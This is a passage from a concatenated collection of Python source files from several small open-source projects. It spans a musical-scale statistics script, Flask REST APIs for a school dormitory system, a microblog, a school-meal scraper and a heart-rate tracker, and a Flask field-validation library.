d_arr.append(min([int(y) for y in dists.split(';')]) if len(dists) else 0)
n_arr.append(len(dists.split(';'))+1 if len(dists) else 1)
d_arr = np.array(d_arr)
cost = np.zeros(len(w_arr), dtype=float)
idx = np.where(d_arr)[0]
cost[idx] = w_arr[idx] / d_arr[idx]
# idx = [i for i in range(cost.size) if 0< d_arr[i] < 20]
# if len(idx):
# cost[idx] = cost[idx] + 10.
idxMin = np.argmin(cost)
return ';'.join([str(y) for y in [round(cost[idxMin],3)+ALPHA_W, w_arr[idxMin], d_arr[idxMin], n_arr[idxMin]]])
df['tmp'] = df.pair_ints.swifter.apply(fn)
df['opt_c'] = df.tmp.swifter.apply(lambda x: float(x.split(';')[0]))
df['opt_w'] = df.tmp.swifter.apply(lambda x: int(x.split(';')[1]))
df['opt_d'] = df.tmp.swifter.apply(lambda x: int(x.split(';')[2]))
df['opt_n'] = df.tmp.swifter.apply(lambda x: int(x.split(';')[3]))
return df.drop(columns=['tmp'])
def calculate_highest_minimum(df):
cols = [c for c in df.columns if len(c.split('_')) == 3 and c[-3:] == 'min']
df['best_sep'] = df.swifter.apply(lambda x: max([x[c] for c in cols]))
return df
def calculate_distance_between_windows(x, w):
ints = sorted([int(y) for y in x.split(';')])
windows = [[ints[0]]]
for i in ints[1:]:
if i - windows[-1][0] < w:
windows[-1].append(i)
else:
windows.append([i])
if len(windows) == 1:
return ''
else:
dist = [windows[i+1][0] - windows[i][-1] for i in range(len(windows)-1)]
return ';'.join([str(d) for d in dist]) if len(dist) > 1 else str(dist[0])
def get_distance_between_windows(df, w, X='pair_ints'):
df[f"d_w{w}"] = df.loc[:,X].swifter.apply(lambda x: calculate_distance_between_windows(x, w))
df[f"d_w{w}_min"] = df.loc[:,f"d_w{w}"].swifter.apply(lambda x: min([int(y) for y in x.split(';')]) if len(x) else 0)
df[f"d_w{w}_mean"] = df.loc[:,f"d_w{w}"].swifter.apply(lambda x: np.mean([int(y) for y in x.split(';')]) if len(x) else 0)
return df
def calc_relative_entropy(pk, qk):
RE = 0.0
for i in range(len(pk)):
if pk[i] <= 0 or qk[i] <= 0:
pass
else:
RE += pk[i] * np.log2(pk[i] / qk[i])
return RE
def calc_jensen_shannon_distance(pk, qk):
mk = 0.5 * (pk + qk)
return (0.5 * (calc_relative_entropy(pk, mk) + calc_relative_entropy(qk, mk))) ** 0.5
def convert_grid(grid, y, num=1201):
new_grid = np.linspace(0, 1200, num=num)
new_y = np.zeros(num, dtype=float)
if grid[0] < 0:
start_point = 0
else:
start_point = np.where(new_grid - grid[0] > 0)[0][0]
if grid[-1] > 1200:
end_point = num
else:
end_point = np.where(new_grid - grid[-1] > 0)[0][0]
for i in range(start_point, end_point):
idx = np.where(grid - new_grid[i] > 0)[0][0]
new_y[i] = y[idx-1] + (new_grid[i] - grid[idx-1]) * (y[idx] - y[idx-1]) / (grid[idx] - grid[idx-1])
return new_grid, new_y
def smooth_dist_kde(df, cat='pair_ints', hist=False):
X = [float(x) for y in df.loc[:,cat] for x in y.split(';')]
kde = smnp.KDEUnivariate(np.array(X))
kde.fit(kernel='gau', bw='scott', fft=1, gridsize=10000, cut=20)
grid, y = kde.support, kde.density
if hist:
hist, edges = np.histogram(X, bins=grid, normed=True)
xxx = grid[:-1] + (grid[1] - grid[0]) * 0.5
return grid, y, xxx, hist
else:
return grid, y
def get_KDE(df, cat):
xKDE, yKDE = smooth_dist_kde(df, cat=cat)
xKDE, yKDE = convert_grid(xKDE, yKDE)
return yKDE / np.trapz(yKDE)
def get_real_scales_dists(n, df_real):
fHist = os.path.join(REAL_DIR, f"n_{n}_hist.npy")
fKDE = os.path.join(REAL_DIR, f"n_{n}_kde.npy")
if os.path.exists(fHist):
data = np.load(fHist)
xHist, yHist = data[:,0], data[:,1]
data = np.load(fKDE)
new_grid, new_y = data[:,0], data[:,1]
else:
xKDE, yKDE, xHist, yHist = smooth_dist_kde(df_real.loc[df_real.n_notes==n], cat='pair_ints', hist=True)
new_grid, new_y = convert_grid(xKDE, yKDE)
np.save(fHist, np.array([xHist, yHist]).T)
np.save(fKDE, np.array([new_grid, new_y]).T)
return new_grid, new_y, xHist, yHist
def calculate_energy_from_intervals(ints, base, m, n):
return np.mean([abs(round(i/base) - i/base)**m * float(round(i/base))**n for i in ints])
def template_function(ints, m, n):
ints = [float(x) for x in ints.split(';')]
temp_min = max(TEMP_MIN, min(ints)*TEMP_LOW_MARGIN)
temp_max = min(TEMP_MAX, min(ints)*TEMP_HI_MARGIN)
baseArr = np.linspace(temp_min, temp_max, num=N_TRIALS)
energies = np.zeros(baseArr.size, dtype=float)
for i, base in enumerate(baseArr):
energies[i] = calculate_energy_from_intervals(ints, base, m, n)
if len(np.where(energies==0)[0]) > 1:
idxMin = np.where(energies==0)[0][-1]
else:
idxMin = np.argmin(energies)
return energies[idxMin]
def test_distinguishability_integer_multiples(df):
for n in range(3):
for m in range(3):
if N_PROC > 1:
pool = mp.Pool(N_PROC)
df[f"distI_{m}_{n}"] = pool.starmap(template_function, product(df.pair_ints, [m], [n]))
pool.close()
else:
df[f"distI_{m}_{n}"] = df.pair_ints.swifter.apply(lambda x: template_function(x, m, n))
return df
def test_distinguishability_window_distance(df):
return calculate_optimum_window_size(df)
def test_harmonic_series_similarity(df, n):
for i in range(5,25,5):
df[f"hs_n{n}_w{i:02d}"] = get_harmonic_similarity_score_series(df.all_ints2, i, n)
return df
def str_to_ints(st, delim=';'):
return [int(s) for s in st.split(delim) if len(s)]
def ints_to_str(i):
return ';'.join([str(x) for x in i])
def get_all_ints(df, old='pair_ints', new='all_ints2'):
def fn(pi):
ints = np.array(str_to_ints(pi))
return ints_to_str([x for i in range(len(ints)) for x in np.cumsum(np.roll(ints,i))[:-1]])
df[new] = df[old].apply(fn)
return df
def calculate_fifths_bias(df):
for w in [5,10,15,20]:
df[f"Nim5_r0.0_w{w}"] = [float(len([z for z in y.split(';') if abs(702-int(z)) <= w]) / len(y.split(';'))) for y in df.all_ints2]
return df
def process_df(df, grid):
timeS = time.time()
if grid and MIX:
# df['scale'] = df.scale.swifter.apply(lambda x: '0;' + x)
if N_PROC > 1:
pool = mp.Pool(N_PROC)
df['mix_ints'] = pool.map(choose_permutation, df.pair_ints, CHUNK)
df['mix_scale'] = pool.map(get_scale_from_pair_ints, df.mix_ints, CHUNK)
pool.close()
else:
df['mix_ints'] = df.pair_ints.swifter.apply(choose_permutation)
df['mix_scale'] = df.mix_ints.swifter.apply(get_scale_from_pair_ints)
# print(f"Mixing: {(time.time()-timeS)/60.} minutes")
df['min_int'] = df.pair_ints.apply(lambda x: min([int(y) for y in x.split(';')]))
df = df.drop(index=df.loc[df.min_int==0].index).reset_index(drop=True)
df['max_int'] = df.pair_ints.apply(lambda x: max([int(y) for y in x.split(';')]))
print(f"Min/max: {(time.time()-timeS)/60.} minutes")
df = get_all_ints(df)
print(f"All_ints2: {(time.time()-timeS)/60.} minutes")
df = test_distinguishability_integer_multiples(df)
print(f"DistI: {(time.time()-timeS)/60.} minutes")
df = calculate_fifths_bias(df)
print(f"Fifths score: {(time.time()-timeS)/60.} minutes")
# df = test_distinguishability_window_distance(df)
# print(f"DistW: {(time.time()-timeS)/60.} minutes")
# df['opt_c_I1'] = df.opt_c * df.distI_0_1
# df['opt_c_I2'] = df.opt_c * df.distI_0_2
# print(f"DistW_S1: {(time.time()-timeS)/60.} minutes")
# def small_int_bias(x, n):
# ints = np.array([int(y) for y in x.split(';')])
# return np.sum(ints**n) / 1200.**n
# df['opt_c_s2'] = df.opt_c * df.pair_ints.swifter.apply(lambda x: small_int_bias(x, 2))
# df['opt_c_s3'] = df.opt_c * df.pair_ints.swifter.apply(lambda x: small_int_bias(x, 3))
# print(f"DistW_S2: {(time.time()-timeS)/60.} minutes")
df = test_harmonic_series_similarity(df, 1)
df = test_harmonic_series_similarity(df, 2)
df = test_harmonic_series_similarity(df, 3)
print(f"HS: {(time.time()-timeS)/60.} minutes")
return df
def ss_fn(x, df_real, idx, w):
return ';'.join([str(i) for i in idx if is_scale_similar(x, df_real.loc[i, 'scale'], w)])
def process_grid_similar_scales(df_grid, df_real, n):
timeS = time.time()
if args.sample:
samples = ['theory', 'instrument'] + [f"sample_f{frac:3.1f}_{i:02d}" for frac in [0.4, 0.6, 0.8] for i in range(10)]
for w in [10, 20]:
for i, s in enumerate(samples):
idx = df_real[i].loc[df_real[i].n_notes==n].index
if N_PROC > 1:
pool = mp.Pool(N_PROC)
df_grid[f'{s}_ss_w{w:02d}'] = pool.starmap(ss_fn, product(df_grid.scale, [df_real[i]], [idx], [w]))
pool.close()
else:
df_grid[f'{s}_ss_w{w:02d}'] = df_grid.scale.apply(lambda x: ss_fn(x, df_real[i], idx, w))
print(f"ss_w{w:02d}: {(time.time()-timeS)/60.} minutes")
else:
idx = df_real.loc[df_real.n_notes==n].index
for w in [10, 20]:
if N_PROC > 1:
pool = mp.Pool(N_PROC)
df_grid[f'ss_w{w:02d}'] = pool.starmap(ss_fn, product(df_grid.scale, [df_real], [idx], [w]))
if MIX:
df_grid[f'mss_w{w:02d}'] = pool.starmap(ss_fn, product(df_grid.mix_scale, [df_real], [idx], [w]))
pool.close()
else:
df_grid[f'ss_w{w:02d}'] = df_grid.scale.swifter.apply(lambda x: ss_fn(x, df_real, idx, w))
if MIX:
df_grid[f'mss_w{w:02d}'] = df_grid.mix_scale.swifter.apply(lambda x: ss_fn(x, df_real, idx, w))
print(f"ss_w{w:02d}: {(time.time()-timeS)/60.} minutes")
return df_grid
def is_scale_similar(x, y, w):
xint = [int(a) for a in x.split(';')]
yint = [int(a) for a in y.split(';')]
return np.allclose(xint, yint, atol=w)
def how_much_real_scales_predicted(df, n_real, w):
return float(len(set([int(x) for y in df[f"ss_w{w:02d}"] for x in y.split(';') if len(y)]))) / float(n_real)
def mixing_cost_arr(arr):
return np.array([np.mean([np.abs(ints[(i-1)] + ints[i%len(ints)] - 2400./float(len(ints)))**2 for i in range(1,len(ints)+1)])**0.5 for ints in arr])
def get_probability_from_costs(costs):
return np.array([np.exp(1./c) / np.sum(np.exp(1./costs)) for c in costs])
def permute_scale(int_str):
ints = np.array([int(x) for x in int_str.split(';')])
return np.array(list(set(permutations(ints))))
def choose_permutation(int_str):
perm = permute_scale(int_str)
costs = mixing_cost_arr(perm)
np.random.seed()
if np.any(costs==0):
return ';'.join([str(int(round(x))) for x in perm[np.random.randint(len(perm))]])
else:
prob = get_probability_from_costs(costs/costs.max())
ran = np.random.rand()
cumprob = np.cumsum(prob)
return ';'.join([str(int(round(x))) for x in perm[np.where(cumprob>ran)[0][0]]])
def get_metrics(grid, y1, y2):
y1 = y1.reshape(y1.size)
y2 = y2.reshape(y2.size)
geo_norm = np.sqrt(np.dot(y1, y2))
err_sq = np.sqrt(np.dot(y1-y2, y1-y2))
balpeak_geo_norm = np.sqrt(np.dot(y1, y2/y2.max()*y1.max()))
balpeak_err_sq = np.sqrt(np.dot(y1-y2/y2.max()*y1.max(), y1-y2/y2.max()*y1.max()))
cum_geo_norm = np.sqrt(np.dot(np.cumsum(y1), np.cumsum(y2)))
cum_err_sq = np.sqrt(np.dot(np.cumsum(y1) - np.cumsum(y2), np.cumsum(y1) - np.cumsum(y2)))
peak1 = argrelextrema(y1, np.greater)[0]
peak2 = argrelextrema(y2, np.greater)[0]
peak_ratio = float(len(peak1)) / float(len(peak2))
peak_dist = 0.0
for p1 in peak1:
peak_dist += np.min(np.abs(peak2-p1))
d1 = y1[1:] - y1[:-1]
d2 = y2[1:] - y2[:-1]
deriv_gn = np.sqrt(np.dot(d1, d2))
deriv_es = np.sqrt(np.dot(d1-d2, d1-d2))
output = [geo_norm, err_sq, balpeak_geo_norm, balpeak_err_sq, cum_geo_norm,
cum_err_sq, peak_ratio, peak_dist, deriv_gn, deriv_es]
return output
if __name__ == "__main__":
categories = ['pair_ints']
n = int(args.fName.split('_')[0].strip('n'))
n_arr = np.array([n])
if args.sample:
df_real = [pd.read_feather(os.path.join(REAL_DIR, 'Samples', f"{f}.feather")) for f in ['theory', 'instrument'] + \
[f"sample_f{frac:3.1f}_{i:02d}" for frac in [0.4, 0.6, 0.8] for i in range(10)]]
else:
if os.path.exists(os.path.join(REAL_DIR, 'theories_real_scales.feather')):
df_real = pd.read_feather(os.path.join(REAL_DIR, 'theories_real_scales.feather'))
else:
df_real = pd.read_feather(os.path.join(REAL_DIR, 'real_scales.feather'))
df_real = process_df(df_real, 0)
df_real.to_feather(os.path.join(REAL_DIR, 'theories_real_scales.feather'))
def read_model_results(path):
print(path)
fName = os.path.split(path)[1]
if args.sample:
pro_name = os.path.join(PRO_DIR, 'sample_'+fName)
else:
pro_name = os.path.join(PRO_DIR, fName)
tmp_df = pd.read_feather(path)
tmp_df['beta'] = float(fName.split('_')[-1].strip('.feather'))
tmp_df = process_df(tmp_df, 1)
n = int(fName.split('_')[0].strip('n'))
tmp_df = process_grid_similar_scales(tmp_df, df_real, n)
tmp_df.to_feather(pro_name)
return tmp_df
df_grid = read_model_results(os.path.join(RAW_DIR, args.fName))
# df_grid = read_model_results(os.path.join(PRO_DIR, args.fName))
``` |
{
"source": "JoMingyu/Blockchain-py",
"score": 2
} |
#### File: app/views/__init__.py
```python
from flask_restful import Api
class ViewInjector:
def __init__(self, app=None):
if app is not None:
self.init_app(app)
def init_app(self, app):
from app.views.blockchain import Node, Chain, Mine, Transaction
api = Api(app)
api.add_resource(Node, '/node')
api.add_resource(Chain, '/chain')
api.add_resource(Mine, '/mine')
api.add_resource(Transaction, '/transaction')
``` |
{
"source": "JoMingyu/DMS-Migrates-to-Python",
"score": 2
} |
#### File: admin/post/faq.py
```python
from flask import request, session, abort
from flask_restful import Resource
from support.user.user_manager import get_admin_id_from_request
from database.mongodb import faq
from pymongo.collection import ObjectId
class FAQ(Resource):
"""
FAQ(POST, DELETE, GET, PATCH available)
"""
def post(self):
if not get_admin_id_from_request(request, session):
abort(403)
title = request.form.get('title')
content = request.form.get('content')
faq.insert({
'title': title,
'content': content
})
return '', 201
def delete(self):
if not get_admin_id_from_request(request, session):
abort(403)
_id = request.form.get('_id')
faq.remove({
'_id': ObjectId(_id)
})
return '', 200
def get(self):
# list
data = list(faq.find())
for idx in range(len(data)):
data[idx]['_id'] = str(data[idx]['_id'])
return data, 200
def patch(self):
if not get_admin_id_from_request(request, session):
abort(403)
_id = request.form.get('_id')
title = request.form.get('title')
content = request.form.get('content')
faq.update({'_id': ObjectId(_id)}, {
'title': title,
'content': content
})
return '', 200
```
#### File: developer/initializer/account.py
```python
from flask import request
from flask_restful import Resource
import uuid as _uuid
from support.crypto import *
from database.mongodb import student_acc
class NewUUID(Resource):
"""
새로운 UUID 생성(POST available)
"""
def post(self):
number = request.form.get('number', type=int)
name = request.form.get('name')
uuid = str(_uuid.uuid4())
student_acc.insert({
'id': None,
'pw': None,
'sid': None,
'uuid': sha.encrypt(uuid),
'number': aes.encrypt(number),
'name': aes.encrypt(name)
})
return uuid, 201
class Migration(Resource):
"""
신입생들이 들어오는 매 해마다 학번 마이그레이션'담당
1. 데이터베이스에서 3학년 삭제
2. legacy uuid 엑셀에서 1~2학년 학생들의 데이터를 가져옴(tuple in list)
3. 신규 학생 데이터 엑셀에서 2~3학년 학생들의 데이터를 가져옴(tuple in list)
4. 이름이 매칭되는 신규 학번을 가져옴
5. uuid에 조건을 걸고 legacy 학번을 신규 학번으로 교체
* 동명이인 문제 해결
(1) 학번을 교체하기 위해서
(2) 이름을 매칭하는 것이기 때문에
이름을 임시로 수정하는 방법으로 해결 가능
ex) 10101 김지수, 10102 김지수가 20101 김지수, 20201 김지수로 올라갔을 때
10101 김지수와 20101 김지수가 같은 사람이라고 가정하면 임시로 양쪽 다 ' 김지수1' 이라는 이름을 지어 주고
10102 김지수와 20201 김지수가 같은 사람이므로 임시로 양쪽 다 ' 김지수2'라는 이름을 지어 주면
코드로서 동명이인 문제를 해결할 수 있다
"""
_legacy_uuid_excel = 'legacy_uuid'
def post(self):
def remove_3rd():
data = list(student_acc.find())
for d in data:
if aes.decrypt(d['number']) > 30000:
student_acc.remove({'number': d['number']})
def read_legacy_data():
data = list()
# Some logic..
return data
def read_new_data():
data = list()
# some logic..
return data
def change_student_data(uuid, number_for_change):
data = dict(student_acc.find_one({'uuid': sha.encrypt(uuid)}))
data.update({
'number': aes.encrypt(number_for_change)
})
student_acc.update({'uuid': sha.encrypt(uuid)}, data)
remove_3rd()
legacy_data = read_legacy_data()
new_data = read_new_data()
for legacy_idx, legacy in enumerate(legacy_data):
legacy_number, legacy_name, uuid = legacy
assert legacy_number == int
for new_idx, new in enumerate(new_data):
new_number, new_name = new
assert new_number == int
if legacy_name == new_name and legacy_number / 10000 + 1 == new_number / 10000:
change_student_data(uuid, new_number)
del legacy_data[legacy_idx]
del new_data[new_idx]
return '', 201
```
#### File: student/account/account.py
```python
from flask import request, session, Response
from flask_restful import Resource
import uuid as _uuid
from support.user.user_manager import get_uuid_from_request
from support.crypto import *
from database.mongodb import student_acc
# 학생 계정의 구성 : uuid, 학번, 이름, id, 비밀번호, sid
class Signup(Resource):
"""
uuid 기반 학생 회원가입(POST available)
"""
def post(self):
uuid = sha.encrypt(request.form.get('uuid'))
_id = aes.encrypt(request.form.get('id'))
pw = sha.encrypt(request.form.get('pw'))
if not student_acc.find_one({'uuid': uuid}):
# 1. uuid가 존재하지 않음
return '', 204
elif student_acc.find_one({'uuid': uuid})['id'] is not None:
# 2. 이미 회원가입 완료된 uuid
return '', 204
elif student_acc.find_one({'id': _id}):
# 3. 이미 가입되어 있는 id
return 'c', 204
data = student_acc.find_one({'uuid': uuid})
data.update({
'id': _id,
'pw': pw
})
student_acc.update({'uuid': uuid}, data)
return '', 201
class SignIn(Resource):
"""
학생 로그인(POST available)
"""
def post(self):
_id = aes.encrypt(request.form.get('id'))
pw = sha.encrypt(request.form.get('pw'))
keep_login = request.form.get('keep_login', False, bool)
if student_acc.find_one({'id': _id, 'pw': pw}):
# 로그인 성공
resp = Response('', 201)
sid = str(_uuid.uuid4())
if keep_login:
# 로그인 유지 - 쿠키
resp.set_cookie('UserSession', sid)
else:
# 로그인 비유지 - 세션
session['UserSession'] = sid
data = student_acc.find_one({'id': _id})
data.update({
'sid': sid
})
student_acc.update({'id': _id}, data)
# SID 업데이트
return resp
else:
return '', 204
class Logout(Resource):
"""
로그아웃(POST available)
"""
def post(self):
uuid = get_uuid_from_request(request, session)
if uuid:
data = student_acc.find_one({'uuid': uuid})
data.update({
'sid': None
})
student_acc.update({'uuid': uuid}, data)
resp = Response('', 201)
if 'UserSession' in request.cookies:
resp.set_cookie('UserSession', '', expires=0)
elif 'UserSession' in session:
session.pop('UserSession')
return resp
else:
return '', 204
```
#### File: student/apply/extension.py
```python
from flask import request, session
from flask_restful import Resource
from support.user.user_manager import get_uuid_from_request
from database.mongodb import extension
class Extension(Resource):
"""
연장신청(POST, GET, DELETE available)
"""
def post(self):
uuid = get_uuid_from_request(request, session)
if not uuid:
return '', 204
_class = request.form.get('class')
value = request.form.get('value', 1, int)
extension.remove({'uuid': uuid})
extension.insert({
'uuid': uuid,
'class': _class,
'value': value
})
return '', 201
def get(self):
uuid = get_uuid_from_request(request, session)
if not uuid:
return '', 204
return extension.find_one({'uuid': uuid}, {'_id': False}), 200
def delete(self):
uuid = get_uuid_from_request(request, session)
if not uuid:
return '', 204
extension.remove({'uuid': uuid})
return '', 200
```
#### File: support/user/user_manager.py
```python
from database.mongodb import student_acc, admin_acc
def get_uuid_from_request(request, session):
sid = ''
if 'UserSession' in session:
sid = session['UserSession']
elif 'UserSession' in request.cookies:
sid = request.cookies['UserSession']
data = student_acc.find_one({'sid': sid})
return data['uuid'] if data else None
def get_admin_id_from_request(request, session):
sid = ''
if 'AdminSession' in session:
sid = session['AdminSession']
elif 'AdminSession' in request.cookies:
sid = request.cookies['AdminSession']
data = admin_acc.find_one({'sid': sid})
return data['id'] if data else None
``` |
{
"source": "JoMingyu/Flask-Large-Application-Example-Simplified",
"score": 3
} |
#### File: app/views/__init__.py
```python
from functools import wraps
from flask import abort, request
def json_required(*required_keys):
def decorator(fn):
if fn.__name__ == 'get':
print('[WARN] JSON with GET method? on "{}()"'.format(fn.__qualname__))
@wraps(fn)
def wrapper(*args, **kwargs):
if not request.is_json:
abort(406)
for required_key in required_keys:
if required_key not in request.json:
abort(400)
return fn(*args, **kwargs)
return wrapper
return decorator
class Router(object):
"""
REST resource routing helper class like standard flask 3-rd party libraries
"""
def __init__(self, app=None):
if app is not None:
self.init_app(app)
def init_app(self, app):
"""
Routes resources. Use app.register_blueprint() aggressively
"""
from app.views import sample
app.register_blueprint(sample.api.blueprint)
```
#### File: app/views/sample.py
```python
from flask import Blueprint, request
from flask_restful import Api, Resource
from app.views import json_required
api = Api(Blueprint('sample_api', __name__))
api.prefix = '/prefix'
@api.resource('/sample')
class Sample(Resource):
@json_required('name', 'age')
def post(self):
return request.json
``` |
{
"source": "JoMingyu/Flask-Validation",
"score": 3
} |
#### File: Flask-Validation/flask_validation/fields.py
```python
import re
class _BaseField:
"""
Base field class
"""
def __init__(self, validator_function=None, enum=None, required: bool=True, allow_null: bool=False):
self.required = required
self.enum = enum
self.allow_null = allow_null
self.validator_function = validator_function
def validate(self, value):
if self.enum is not None and value not in self.enum:
return False
# allow_null은 decorators.py에서 체크
if self.validator_function is not None and not self.validator_function(value):
return False
class StringField(_BaseField):
"""
String field class
"""
def __init__(self, allow_empty: bool=True, min_length: int=None, max_length: int=None, regex=None, **kwargs):
self.allow_empty = allow_empty
self.min_length = min_length
self.max_length = max_length
self.regex = re.compile(regex) if regex else None
super(StringField, self).__init__(**kwargs)
def validate(self, value):
if not isinstance(value, str):
return False
if self.max_length is not None and len(value) > self.max_length:
return False
if self.min_length is not None and len(value) < self.min_length:
return False
if self.regex is not None and self.regex.match(value) is None:
return False
return super(StringField, self).validate(value)
class NumberField(_BaseField):
"""
Number field class
"""
def __init__(self, min_value=None, max_value=None, **kwargs):
self.min_value = min_value
self.max_value = max_value
super(NumberField, self).__init__(**kwargs)
def validate(self, value):
if self.min_value is not None and value < self.min_value:
return False
if self.max_value is not None and value > self.max_value:
return False
return super(NumberField, self).validate(value)
class IntField(NumberField):
"""
Int field class
"""
def validate(self, value):
if not isinstance(value, int):
return False
return super(IntField, self).validate(value)
class FloatField(NumberField):
"""
Float field class
"""
def validate(self, value):
if not isinstance(value, float):
return False
return super(FloatField, self).validate(value)
class BooleanField(_BaseField):
"""
Boolean field class
"""
def validate(self, value):
if not isinstance(value, bool):
return False
return super(BooleanField, self).validate(value)
class ListField(_BaseField):
"""
List field class
"""
def __init__(self, min_length: int=None, max_length: int=None, **kwargs):
self.min_length = min_length
self.max_length = max_length
super(ListField, self).__init__(**kwargs)
def validate(self, value):
if not isinstance(value, list):
return False
if self.max_length is not None and len(value) > self.max_length:
return False
if self.min_length is not None and len(value) < self.min_length:
return False
return super(ListField, self).validate(value)
``` |
{
"source": "JoMingyu/Functional-Thinking",
"score": 4
} |
#### File: JoMingyu/Functional-Thinking/04. Natural Number Classifier.py
```python
def get_aliquot_sum(n):
return sum([i for i in range(1, n) if n % i == 0])
# 완전수
def is_perfect(n):
return get_aliquot_sum(n) == n
# 과잉수
def is_abundant(n):
return get_aliquot_sum(n) > n
# 부족수
def is_deficient(n):
return get_aliquot_sum(n) < n
``` |
{
"source": "JoMingyu/minitwit-py",
"score": 2
} |
#### File: app/views/follow.py
```python
from flask import Blueprint, Response, abort, g
from flask_restful import Api
from app.models.user import UserModel, FollowModel
from app.views import BaseResource, auth_required
api = Api(Blueprint(__name__, __name__))
api.prefix = '/<username>'
@api.resource('/follow')
class Follow(BaseResource):
@auth_required(UserModel)
def post(self, username):
if g.user.username == username:
abort(400)
users = UserModel.select().where(UserModel.username == username)
if not users:
return Response('', 204)
user = users[0]
if FollowModel.select().where( (FollowModel.follower == g.user) & (FollowModel.followee == user) ):
return Response('', 208)
FollowModel.insert(follower=g.user, followee=user).execute()
return Response('', 201)
@auth_required(UserModel)
def delete(self, username):
if g.user.username == username:
abort(400)
users = UserModel.select().where(UserModel.username == username)
if not users:
return Response('', 204)
user = users[0]
FollowModel.delete().where( (FollowModel.follower == g.user) & (FollowModel.followee == user) ).execute()
return Response('', 200)
``` |
{
"source": "JoMingyu/School-API-Python",
"score": 3
} |
#### File: School-API-Python/schapi/api.py
```python
from urllib.request import urlopen
from bs4 import BeautifulSoup
import re
_url = 'http://{0}/sts_sci_md00_001.do?schulCode={1}&schulCrseScCode=4&schulKndScScore=04&schYm={2}{3:0>2}'
SEOUL = 'stu.sen.go.kr'
BUSAN = 'stu.pen.go.kr'
DAEGU = 'stu.dge.go.kr'
INCHEON = 'stu.ice.go.kr'
GWANGJU = 'stu.gen.go.kr'
DAEJEON = 'stu.dje.go.kr'
ULSAN = 'stu.use.go.kr'
SEJONG = 'stu.sje.go.kr'
GYEONGGI = 'stu.cbe.go.kr'
KANGWON = 'stu.kwe.go.kr'
CHUNGBUK = 'stu.cbe.go.kr'
CHUNGNAM = 'stu.cne.go.kr'
JEONBUK = 'stu.jbe.go.kr'
JEONNAM = 'stu.jne.go.kr'
GYEONGBUK = 'stu.gbe.go.kr'
GYEONGNAM = 'stu.gne.go.kr'
JEJU = 'stu.jje.go.kr'
class SchoolAPI:
def __init__(self, region, school_code):
self.region = region
self.school_code = school_code
self.menus = []
self.current_year = 0
self.current_month = 0
# 파싱되기 전 대기
def get_by_date(self, year, month, day):
"""
Inquire school meals based date
:param year: Year to inquire
:param month: Month to inquire
:param day: Day to inquire
:type year: int
:type month: int
:type day: int
:return: Returns meal dictionary
:rtype: dict
"""
self._validate(year, month)
return self.menus[day]
def get_monthly(self, year, month):
"""
Inquire monthly school meals
:param year: Year to inquire
:param month: Month to inquire
:type year: int
:type month: int
:return: Returns meals list
:rtype: list
"""
self._validate(year, month)
return self.menus
def _validate(self, year, month):
# 파싱 전 값 검증
if not self.menus or (self.current_year != year or self.current_month != month):
self._parse(year, month)
def _parse(self, year, month):
self.menus.clear()
self.menus.append({})
self.current_year = year
self.current_month = month
resp = urlopen(_url.format(self.region, self.school_code, year, month))
soup = BeautifulSoup(resp, 'html.parser')
for data in [td.text for td in soup.find(class_='tbl_type3 tbl_calendar').find_all('td') if td.text != ' ']:
if len(data) > 1 and data != '자료가 없습니다':
daily_menus = re.findall('[가-힇]+\(\w+\)|[가-힇]+', data)
menu_dict = dict()
timing = [menu for menu in daily_menus if re.match('[조중석]식', menu)]
# 조식, 중식, 석식 중 있는 데이터만
for i in range(len(timing)):
if i + 1 >= len(timing):
# 마지막 메뉴
menu_dict[timing[i]] = daily_menus[daily_menus.index(timing[i]) + 1:]
else:
menu_dict[timing[i]] = daily_menus[daily_menus.index(timing[i]) + 1: daily_menus.index(timing[i + 1])]
try:
menu_dict['breakfast'] = menu_dict.pop('조식')
except KeyError:
pass
try:
menu_dict['lunch'] = menu_dict.pop('중식')
except KeyError:
pass
try:
menu_dict['dinner'] = menu_dict.pop('석식')
except KeyError:
pass
self.menus.append(menu_dict)
else:
self.menus.append({})
if __name__ == '__main__':
api = SchoolAPI(DAEJEON, 'G100000170')
```
#### File: server/support/xlsx_parser.py
```python
from openpyxl import load_workbook
from db.models.school_data import SchoolModel
WEB_URLS = {
'서울특별시': 'stu.sen.go.kr',
'부산광역시': 'stu.pen.go.kr',
'대구광역시': 'stu.dge.go.kr',
'인천광역시': 'stu.ice.go.kr',
'광주광역시': 'stu.gen.go.kr',
'대전광역시': 'stu.dje.go.kr',
'울산광역시': 'stu.use.go.kr',
'세종특별자치시': 'stu.sje.go.kr',
'경기도': 'stu.cbe.go.kr',
'강원도': 'stu.kwe.go.kr',
'충청북도': 'stu.cbe.go.kr',
'충청남도': 'stu.cne.go.kr',
'전라북도': 'stu.jbe.go.kr',
'전라남도': 'stu.jne.go.kr',
'경상북도': 'stu.gbe.go.kr',
'경상남도': 'stu.gne.go.kr',
'제주특별자치도': 'stu.jje.go.kr'
}
wb = load_workbook('schoolcodes.xlsx')
sheet = wb['codes']
def parse():
SchoolModel.objects().delete()
# 파싱 전 제거
for row in range(2, 3587):
# 현재 학교 코드 엑셀에 있는 row 수
code = sheet['A' + str(row)].value
# 학교 코드
region = sheet['B' + str(row)].value
# 교육청
web_url = WEB_URLS[region]
# 나이스 URL
name = sheet['C' + str(row)].value
# 학교 이름
SchoolModel(code=code, region=region, web_url=web_url, name=name).save()
print('School data Parse Success')
``` |
{
"source": "JoMingyu/WakeHeart",
"score": 2
} |
#### File: api/heart/heart_rate.py
```python
from datetime import date, datetime, timedelta
from flask_restful_swagger_2 import Resource, request, swagger
from flask_jwt import current_identity, jwt_required
from db.models.heart_rate import HeartRateModel
from routes.api.heart import heart_rate_doc
def daterange(d1, d2):
return (d1 + timedelta(days=i) for i in range((d2 - d1).days + 1))
class HeartRate(Resource):
@swagger.doc(heart_rate_doc.HEART_RATE_POST)
@jwt_required()
def post(self):
rate = request.form.get('rate', type=int)
HeartRateModel.objects(id_=str(current_identity), date=str(date.today())).delete()
HeartRateModel(id_=str(current_identity), date=str(date.today()), rate=rate).save()
return '', 201
@swagger.doc(heart_rate_doc.HEART_RATE_GET)
@jwt_required()
def get(self):
date_ = request.args.get('date')
heart_rate = HeartRateModel.objects(id_=str(current_identity), date=date_)
if not heart_rate:
return '', 204
else:
return {
'rate': heart_rate.first().rate
}, 200
class DateRangeBasedHeartRate(Resource):
@swagger.doc(heart_rate_doc.DATE_RANGE_BASED_HEART_RATE)
@jwt_required()
def get(self):
start_date = datetime.strptime(request.args.get('start_date'), '%Y-%m-%d').date()
end_date = datetime.strptime(request.args.get('end_date'), '%Y-%m-%d').date()
dates = [str(d) for d in daterange(start_date, end_date)]
heart_rates = list()
